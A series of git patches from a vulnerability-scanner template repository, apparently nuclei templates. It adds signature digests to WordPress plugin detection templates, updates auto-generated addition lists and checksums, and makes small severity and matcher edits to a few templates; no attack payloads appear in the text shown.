4a0a00473045022100f0eebadf8b2adcc377296bacab46dfb8112a58fb4f97c299c284bc7615fab51e0220782881cab6f4112463714a5da7ad803286b382b9c921b6da30266c3b07fd5ec1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index c3d10f0135..92d2a1e82a 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100922778079cce903cabc2cb290333c920c8b7996c5d1803d58280b06d1acc388d022100de2235b9c1492e9c9650eacef31abf6a392f3688dce0b328267d929cb66b7855:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 4a8bc6b75c..71bf00763d 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a2be633d9abc487755d7ddfe461867f1d08c43766d68f9d17ca62c2eaa9e88e8022030423560e94ce4d19f6e8526503dc6440b461080de75e24d615fa1a3b05e5686:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index d2c74355bd..fa7c190b4d 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210089554f8f3fb67164c36fc320a486bcea8ea19b28bfd02c93d0c9dec2c728cfeb022100cd1f82b0747312e90fff873728219f8cb0e714a0e1e0b8960fda1ef43e3ec0f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 94b8494b08..63160cc442 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220079f1182fde2e0d9e1e86ce8f0eae179064c795e285cc440ba6f49cb3091df51022100c51b2fa96188d631a2799c553ee56d0cac6b22b18a15c8e5fbef6f0677d6f661:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 108aba79e9..8f405e9ff6 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008f9efea9a299f231a68a2560f55fa0f2dfb6f9c3a962ff58d5f15af42e2befff022014b8c6d7899f71c3a9b90d2459163146c06b2d57d3bccc46ea80121c33b93e3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index f6f6bf5566..3560ece294 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ed379ba66ced620a755e0f62d753bc88ff1b61f5cbd1ec7160907d92fbac007f0220217cd734bebdb2f821d1b9b6611628a5f05d83beba84297884ecbd50a1788da2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 483cb7cac7..c5ec0ed0f7 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100825094f226c62f2004cfa592a07809dcafe56df399b1ca1525f64f8e40f71fb402210087af4f1deb6ab28732cf7c4b645cc6f899a2c45b30f7e2631d34ae5bb3f1bcca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a132c98df4..b956ba5218 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202a3aa28122c563585602b13d9e836fa24a58362fce6cd6c49fc0ccc23727bfef02207bdd25881d93bb7758d530051fd72231c222241bf9062080abb37807b8b72d9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 135bbee046..61fa7557cf 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203fec15ea84c7411a08f4d6839a1b7e75151d8946feb25079225883c36be461a302204f6f3ad5cc950305b91cf55c6433419502eeeee6e992eb0a8b2c9b6fdc07c8a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 5b690d96c0..4b47b9cfa3 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210091777a51292d214376f2a52dd89175568a96c4a703f7288b292404634cfbe908022044bfa993e5eb9aa37863393f85a26ee046e26ae96135b38eef6bc3be5062346e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 16c7d6cff5..725a62c032 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ec4429a9c3ca80eb737cd8a3bafda682f245d1df33d8566ab80b42147834e620022003df917327acf63db661be360c792f0602b5a631b107228a96ba24ab169e8905:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index ab099f357e..9d697511cf 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100dda6393c24b1fe49835a83e4647103db26ec7b11763fa9f8fae7725e3af4fe6d0220106636e521aad9efd3c294826c88603ba7716ad74ccb04a11364922a5ec3988c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index ad0b8f8fed..e2933289cb 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b8f15d42c5160ee1b5ac249df0123c8f41367d1cada9bad692457bcbdea018c4022100ca13ba5ed04f84f58d1bfdaa9f3bde23a99a8e351291c9490d1e40a3794bd63c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaaf0f9a17..6d71b0e7dd 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210086a3aa6270dd4f10754e2cb11a7e27c785a85c490bd43586466b48e976f4233e022067a3fc2aa6969c3bf11afbbd0793b99ff8b9642152737bff3b2fbea82f88adb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index f943c7afeb..1ba50d9c69 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f4eb5e20a3f18c6a950652ca5fd7765bb18aa85e877f6082b6a2f3d16b03d050022034c1a1516cc5152ef7099fb033283a1918e602d96204bf4412802c6716399ce9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 062e5c85b4..20a3667caf 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a7c944c93171309f1c47411347021ed82d75a4ad525414a98dcab7815dcd6b7b022060fc61974b13f947db13c83f7df5b6eefaf3d0e73dcb113df1e3037bb62eb135:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 6dcfdda117..654e7ca8a8 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a547bf37b50b1e560ecb54022eaef44f9a540e67c9634e3604f50c2f5fc6e580022052dc1c411e225d8a5c20e040c1783786c734ff79e3b4ad6d0b4eaae584e728f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 094f9777330b988f04bebf19005ff29e5ab3b1b0 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 10 Jul 2024 06:04:33 +0000 Subject: [PATCH 1039/1841] Auto Generated New Template Addition List [Wed Jul 10 06:04:33 UTC 2024] :robot: --- .new-additions | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/.new-additions b/.new-additions index 6dc3afb8ae..f48ee19f64 100644 --- a/.new-additions +++ b/.new-additions @@ -26,6 +26,7 @@ http/cves/2024/CVE-2024-37152.yaml http/cves/2024/CVE-2024-37881.yaml http/cves/2024/CVE-2024-4434.yaml http/cves/2024/CVE-2024-4836.yaml +http/cves/2024/CVE-2024-5084.yaml http/cves/2024/CVE-2024-5522.yaml http/cves/2024/CVE-2024-5947.yaml http/cves/2024/CVE-2024-6028.yaml @@ -56,12 +57,15 @@ http/technologies/apache/apache-pinot-detect.yaml http/technologies/neo4j-neodash-detect.yaml http/technologies/wordpress/plugins/chaty.yaml http/vulnerabilities/backdoor/polyfill-backdoor.yaml +http/vulnerabilities/hjsoft/hjsoft-hcm-lfi.yaml +http/vulnerabilities/hjsoft/hjsoft-hcm-sqli.yaml http/vulnerabilities/hjsoft/hjsoft-hcm-tb-sqli.yaml http/vulnerabilities/jinhe/jinhe-oa-c6-upload-lfi.yaml http/vulnerabilities/next-js-cache-poisoning.yaml http/vulnerabilities/other/azon-dominator-sqli.yaml http/vulnerabilities/other/bagisto-csti.yaml http/vulnerabilities/other/crocus-lfi.yaml +http/vulnerabilities/other/h3c-cnsss-arbitrary-file-upload.yaml http/vulnerabilities/other/pingsheng-electronic-sqli.yaml http/vulnerabilities/other/sharp-printers-lfi.yaml javascript/enumeration/ldap/ldap-metadata.yaml From 0ba724e172eed8b5c461250ea41c40f8566e7d34 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 10 Jul 2024 06:04:44 +0000 Subject: [PATCH 1040/1841] Auto Generated Templates Checksum [Wed Jul 10 06:04:44 UTC 2024] :robot: --- templates-checksum.txt | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index bb96c205e0..b0786fd1be 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3487,6 +3487,7 @@ http/cves/2024/CVE-2024-4443.yaml:bd877d88a3381249f47f17961c167cb8ae3bfaa9 http/cves/2024/CVE-2024-4577.yaml:c53e4d3f699e49597036f2b9e5ea8ab75e67904b http/cves/2024/CVE-2024-4836.yaml:2dd1cd40b76fc713b718db4852eb9bca8cf67380 http/cves/2024/CVE-2024-4956.yaml:c6be2d64ff4b985c30acc88c57c66d57a846d25a +http/cves/2024/CVE-2024-5084.yaml:5107e0b473951b899c6d55cb89c197fab83115b8 http/cves/2024/CVE-2024-5230.yaml:8b073f5f6aa9e22b66403c2c6297fb487fbade0c http/cves/2024/CVE-2024-5522.yaml:1aae46b20c03316823691aa8755eb8e35b46533a http/cves/2024/CVE-2024-5947.yaml:1007c228fb459bf995a9b759b10c668e190ab1e6 @@ -7849,6 +7850,7 @@ http/vulnerabilities/hikvision/hikvision-fastjson-rce.yaml:02a334888358c47036d90 http/vulnerabilities/hikvision/hikvision-ivms-file-upload-bypass.yaml:bc54a4c9f7771c524140f1840157c03bf4651a54 http/vulnerabilities/hikvision/hikvision-ivms-file-upload-rce.yaml:94de4453e34e7b36379a10dc4966aa54f3582aeb http/vulnerabilities/hikvision/hikvision-js-files-upload.yaml:cdcf6ca5518af130ebd36c1531365f6bb79001c5 +http/vulnerabilities/hjsoft/hjsoft-hcm-lfi.yaml:3382fff2cc55b5f3892ebdf734cb34c764e281c6 http/vulnerabilities/hjsoft/hjsoft-hcm-sqli.yaml:b519d9b8bf96070aca19973c7e9f0f7c9ff7e2ae http/vulnerabilities/hjsoft/hjsoft-hcm-tb-sqli.yaml:f75663ae56be567e6a21e3488413d54ec63f1814 http/vulnerabilities/httpbin/httpbin-open-redirect.yaml:1b66933da5367fcad1de79ed46e41dd9b6b4543a @@ -8035,6 +8037,7 @@ http/vulnerabilities/other/groomify-sqli.yaml:3f757a7ee830559df2f4d03cd5635e1f5c http/vulnerabilities/other/groupoffice-lfi.yaml:f1295e4d7dc7dd52e038ade2373f4576de55dbf8 http/vulnerabilities/other/gsoap-lfi.yaml:aa242baa6456667473b08929ebdd2391ec263823 http/vulnerabilities/other/gz-forum-script-xss.yaml:4f9e19fc198666441fc949361b7e2815bb7e3622 +http/vulnerabilities/other/h3c-cnsss-arbitrary-file-upload.yaml:b64a786aa7952f8c87940b5b5aafd1d80e3f86e2 http/vulnerabilities/other/h3c-cvm-arbitrary-file-upload.yaml:185ebc9353c39517c1963b7755f565f8d2b0ccbb http/vulnerabilities/other/h3c-imc-rce.yaml:2cbd69391843e97f2f3637a982c5ce0314b496bb http/vulnerabilities/other/hanming-lfr.yaml:511265b7bf1fb863ed2ae2d4d1551af5aa110a71 @@ -8857,7 +8860,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:91772ccc7bbd9213f4c7abb38dffd3993a75ec28 +templates-checksum.txt:235a02f2ed8f4e797abe7e3a8e45c16f1d640749 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From afdb42c3e47b198cdd9979dfb8fcf055d42e02e9 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 10 Jul 2024 11:35:09 +0530 Subject: [PATCH 1041/1841] severity update --- http/exposures/tokens/jwk-json-leak.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposures/tokens/jwk-json-leak.yaml b/http/exposures/tokens/jwk-json-leak.yaml index a96df40002..60fe6ab3c1 100644 --- a/http/exposures/tokens/jwk-json-leak.yaml +++ b/http/exposures/tokens/jwk-json-leak.yaml @@ -3,7 +3,7 @@ id: jwk-json-leak info: name: JSON Web Key File - Exposure author: Mohsen Yaghoubi - severity: medium + severity: low description: | Searches for JSON Web Key (JWK) file. reference: From 5a6eebf66317cc599f9a5ca2fff22640f5f697ad Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 10 Jul 2024 06:05:18 +0000 Subject: [PATCH 1042/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 88000cfc7b..b24b15ca36 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -31,6 +31,7 @@ on: - 'http/cves/2024/CVE-2024-37881.yaml' - 'http/cves/2024/CVE-2024-4434.yaml' - 'http/cves/2024/CVE-2024-4836.yaml' + - 'http/cves/2024/CVE-2024-5084.yaml' - 'http/cves/2024/CVE-2024-5522.yaml' - 'http/cves/2024/CVE-2024-5947.yaml' - 'http/cves/2024/CVE-2024-6028.yaml' @@ -61,12 +62,15 @@ on: - 'http/technologies/neo4j-neodash-detect.yaml' - 'http/technologies/wordpress/plugins/chaty.yaml' - 'http/vulnerabilities/backdoor/polyfill-backdoor.yaml' + - 'http/vulnerabilities/hjsoft/hjsoft-hcm-lfi.yaml' + - 'http/vulnerabilities/hjsoft/hjsoft-hcm-sqli.yaml' - 'http/vulnerabilities/hjsoft/hjsoft-hcm-tb-sqli.yaml' - 'http/vulnerabilities/jinhe/jinhe-oa-c6-upload-lfi.yaml' - 'http/vulnerabilities/next-js-cache-poisoning.yaml' - 'http/vulnerabilities/other/azon-dominator-sqli.yaml' - 'http/vulnerabilities/other/bagisto-csti.yaml' - 'http/vulnerabilities/other/crocus-lfi.yaml' + - 'http/vulnerabilities/other/h3c-cnsss-arbitrary-file-upload.yaml' - 'http/vulnerabilities/other/pingsheng-electronic-sqli.yaml' - 'http/vulnerabilities/other/sharp-printers-lfi.yaml' - 'javascript/enumeration/ldap/ldap-metadata.yaml' From 94088e06c2bb74cf3e9a55d8e8a17522d199347f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 10 Jul 2024 11:38:29 +0530 Subject: [PATCH 1043/1841] Update CVE-2024-6188.yaml --- http/cves/2024/CVE-2024-6188.yaml | 10 ++++------ 1 file changed, 4 insertions(+), 6 deletions(-) diff --git a/http/cves/2024/CVE-2024-6188.yaml b/http/cves/2024/CVE-2024-6188.yaml index 4bd6c38aeb..c3bdcf622e 100644 --- a/http/cves/2024/CVE-2024-6188.yaml +++ b/http/cves/2024/CVE-2024-6188.yaml @@ -15,8 +15,8 @@ info: metadata: verified: true max-request: 1 - vendor: Parsec Automation - product: TrackSYS + vendor: parsec-automation + product: tracksys tags: cve,cve2024,traksys,idor,info-leak http: @@ -33,14 +33,12 @@ http: - 'TrakSYS Version' - 'Name' - 'Altname' - - 'Notes' - - 'Key' condition: and - type: word - part: header + part: content_type words: - - 'Content-Disposition: attachment; filename="PageDefinition_Home.pdef"' + - 'text/plain' - type: status status: From 4f0bc6b00170fe4f1e458b6f5912f8d783000394 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 10 Jul 2024 06:08:37 +0000 Subject: [PATCH 1044/1841] Auto Generated New Template Addition List [Wed Jul 10 06:08:37 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index f48ee19f64..ea73af70c1 100644 --- a/.new-additions +++ b/.new-additions @@ -43,6 +43,7 @@ http/exposures/backups/sql-server-dump.yaml http/exposures/configs/apache-pinot-config.yaml http/exposures/configs/filestash-admin-config.yaml http/exposures/configs/neo4j-neodash-config.yaml +http/exposures/tokens/jwk-json-leak.yaml http/misconfiguration/coolify-register-account.yaml http/misconfiguration/forgejo-repo-exposure.yaml http/misconfiguration/installer/kodbox-installer.yaml From 9f928e2b261bfa908ffc92b9214e6f4f2723152c Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 10 Jul 2024 06:09:29 +0000 Subject: [PATCH 1045/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index b24b15ca36..ad65f89578 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -48,6 +48,7 @@ on: - 'http/exposures/configs/apache-pinot-config.yaml' - 'http/exposures/configs/filestash-admin-config.yaml' - 'http/exposures/configs/neo4j-neodash-config.yaml' + - 'http/exposures/tokens/jwk-json-leak.yaml' - 'http/misconfiguration/coolify-register-account.yaml' - 'http/misconfiguration/forgejo-repo-exposure.yaml' - 'http/misconfiguration/installer/kodbox-installer.yaml' From fc60f258892e73a8ad04c260d36af0832920a50e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 10 Jul 2024 06:10:27 +0000 Subject: [PATCH 1046/1841] Auto Template Signing [Wed Jul 10 06:10:27 UTC 2024] :robot: --- http/cves/2024/CVE-2024-5084.yaml | 1 + http/exposures/tokens/jwk-json-leak.yaml | 1 + http/vulnerabilities/hjsoft/hjsoft-hcm-lfi.yaml | 1 + http/vulnerabilities/hjsoft/hjsoft-hcm-sqli.yaml | 1 + http/vulnerabilities/hjsoft/hjsoft-hcm-tb-sqli.yaml | 1 + http/vulnerabilities/other/h3c-cnsss-arbitrary-file-upload.yaml | 1 + http/vulnerabilities/other/pingsheng-electronic-sqli.yaml | 1 + 7 files changed, 7 insertions(+) diff --git a/http/cves/2024/CVE-2024-5084.yaml b/http/cves/2024/CVE-2024-5084.yaml index 184c869cda..3be628087c 100644 --- a/http/cves/2024/CVE-2024-5084.yaml +++ b/http/cves/2024/CVE-2024-5084.yaml @@ -64,3 +64,4 @@ http: regex: - '"ajax_nounce":"([0-9a-z]+)","preview_img' internal: true +# digest: 4a0a00473045022031903fcaa4d2765a2948e67ebb0ffdf4f51f2b6715ec1426f372476ab7cc1f54022100f6f757d7bdbf2faee44dd9dc6faf67322cd1ff0f7c07430c9bd4e9f9bbec82c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/tokens/jwk-json-leak.yaml b/http/exposures/tokens/jwk-json-leak.yaml index 60fe6ab3c1..218b172a38 100644 --- a/http/exposures/tokens/jwk-json-leak.yaml +++ b/http/exposures/tokens/jwk-json-leak.yaml @@ -38,3 +38,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100b718974b135dcbaf5491507c379544edddca58967a6ef8f72eeea45fe2059cb102207edaf758be880a6f6ed1a1cf5e9ac4750f27230c4eac03dd9f0938c88224f416:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/hjsoft/hjsoft-hcm-lfi.yaml b/http/vulnerabilities/hjsoft/hjsoft-hcm-lfi.yaml index adc3fc822b..9000f1d493 100644 --- a/http/vulnerabilities/hjsoft/hjsoft-hcm-lfi.yaml +++ b/http/vulnerabilities/hjsoft/hjsoft-hcm-lfi.yaml @@ -39,3 +39,4 @@ http: - type: status status: - 200 +# digest: 4a0a004730450221008925446fe287f3bbb329320b7d8c65e87d3afafd5c48c0a478435d1f5707704b0220304082dd0ebd884b36d836405c0c4907fd54b58708cd66940acc1304d0107a85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/hjsoft/hjsoft-hcm-sqli.yaml b/http/vulnerabilities/hjsoft/hjsoft-hcm-sqli.yaml index 18754dbfec..a0dddbf4be 100644 --- a/http/vulnerabilities/hjsoft/hjsoft-hcm-sqli.yaml +++ b/http/vulnerabilities/hjsoft/hjsoft-hcm-sqli.yaml @@ -29,3 +29,4 @@ http: - 'contains(header,"text/xml")' - 'status_code == 200' condition: and +# digest: 4a0a0047304502201468a2f6d250e3c7b657984c2bf44c276e47dc58b619fb63d8eaa49de814acbe022100e110c88766244837c5fd8d9bf30d97134d399645ec02583d7a2aa9efb38f5cab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/hjsoft/hjsoft-hcm-tb-sqli.yaml b/http/vulnerabilities/hjsoft/hjsoft-hcm-tb-sqli.yaml index b84234a3a0..43e84fcbeb 100644 --- a/http/vulnerabilities/hjsoft/hjsoft-hcm-tb-sqli.yaml +++ b/http/vulnerabilities/hjsoft/hjsoft-hcm-tb-sqli.yaml @@ -29,3 +29,4 @@ http: - 'contains(header,"text/xml")' - 'status_code == 200' condition: and +# digest: 4b0a004830460221008487f7999fa553bab3563df81495c9656a7959996091429dd5766ab506c198c0022100f8edadd2fa4f855af54c21c8f9d62b72a3ad53c82ba3196c1c969e492e1368fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/h3c-cnsss-arbitrary-file-upload.yaml b/http/vulnerabilities/other/h3c-cnsss-arbitrary-file-upload.yaml index d9c560087b..7a2edbc603 100644 --- a/http/vulnerabilities/other/h3c-cnsss-arbitrary-file-upload.yaml +++ b/http/vulnerabilities/other/h3c-cnsss-arbitrary-file-upload.yaml @@ -42,3 +42,4 @@ http: - 'contains(body_2,"{{md5(num)}}")' - 'status_code_1 == 200 && status_code_2 == 200' condition: and +# digest: 4a0a0047304502205836c3d82803a98ff40be994639c0ef0f831eb261dfb10a38f18d5d9d3c23d7c022100a587e41930c55e90af6b816c3a978203b9a4e359d522fb0a9d3897b3a8d3c541:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/pingsheng-electronic-sqli.yaml b/http/vulnerabilities/other/pingsheng-electronic-sqli.yaml index 0b14c45d62..1bd189e097 100644 --- a/http/vulnerabilities/other/pingsheng-electronic-sqli.yaml +++ b/http/vulnerabilities/other/pingsheng-electronic-sqli.yaml @@ -33,3 +33,4 @@ http: - 'contains(content_type,"text/xml")' - 'status_code == 200' condition: and +# digest: 4a0a004730450220496311996edc771bcc56eb44c74ed2d48fe8a4d19fbe73b626b9ec4807aaa6e5022100ee7b686afbd156f43d0e1f827405e71e15f4a33638379d8d119fe06955e236b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 1ddcae007d6cc41da9a784eeb028c428de20b6c5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 10 Jul 2024 06:12:40 +0000 Subject: [PATCH 1047/1841] Auto Generated Templates Checksum [Wed Jul 10 06:12:40 UTC 2024] :robot: --- templates-checksum.txt | 417 +++++++++++++++++++++-------------------- 1 file changed, 209 insertions(+), 208 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index b0786fd1be..5c41d92a8b 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3487,7 +3487,7 @@ http/cves/2024/CVE-2024-4443.yaml:bd877d88a3381249f47f17961c167cb8ae3bfaa9 http/cves/2024/CVE-2024-4577.yaml:c53e4d3f699e49597036f2b9e5ea8ab75e67904b http/cves/2024/CVE-2024-4836.yaml:2dd1cd40b76fc713b718db4852eb9bca8cf67380 http/cves/2024/CVE-2024-4956.yaml:c6be2d64ff4b985c30acc88c57c66d57a846d25a -http/cves/2024/CVE-2024-5084.yaml:5107e0b473951b899c6d55cb89c197fab83115b8 +http/cves/2024/CVE-2024-5084.yaml:8ede90fad7058c4a2a7499562f98cacae32ede68 http/cves/2024/CVE-2024-5230.yaml:8b073f5f6aa9e22b66403c2c6297fb487fbade0c http/cves/2024/CVE-2024-5522.yaml:1aae46b20c03316823691aa8755eb8e35b46533a http/cves/2024/CVE-2024-5947.yaml:1007c228fb459bf995a9b759b10c668e190ab1e6 @@ -5247,6 +5247,7 @@ http/exposures/tokens/heroku/heroku-api-key.yaml:42bc39394c6b55ba8fdc928397651c2 http/exposures/tokens/huggingface/huggingface-user-access-token.yaml:e8544daaa285ad6d2a73826c0def114d1ea4d563 http/exposures/tokens/jenkins/jenkins-crumb-token.yaml:1a5a3ba9c123df0bef7587520f5ebf336cee34d9 http/exposures/tokens/jotform/jotform-api-key.yaml:cffbadf1bbffc6d45ad799489a3559697635e3ba +http/exposures/tokens/jwk-json-leak.yaml:3f780555508cbc85fe7959f184b896e2f4fabce7 http/exposures/tokens/linkedin/linkedin-client-id.yaml:daadd8cf4d5c8cd943c9573f53f12673378a0bd2 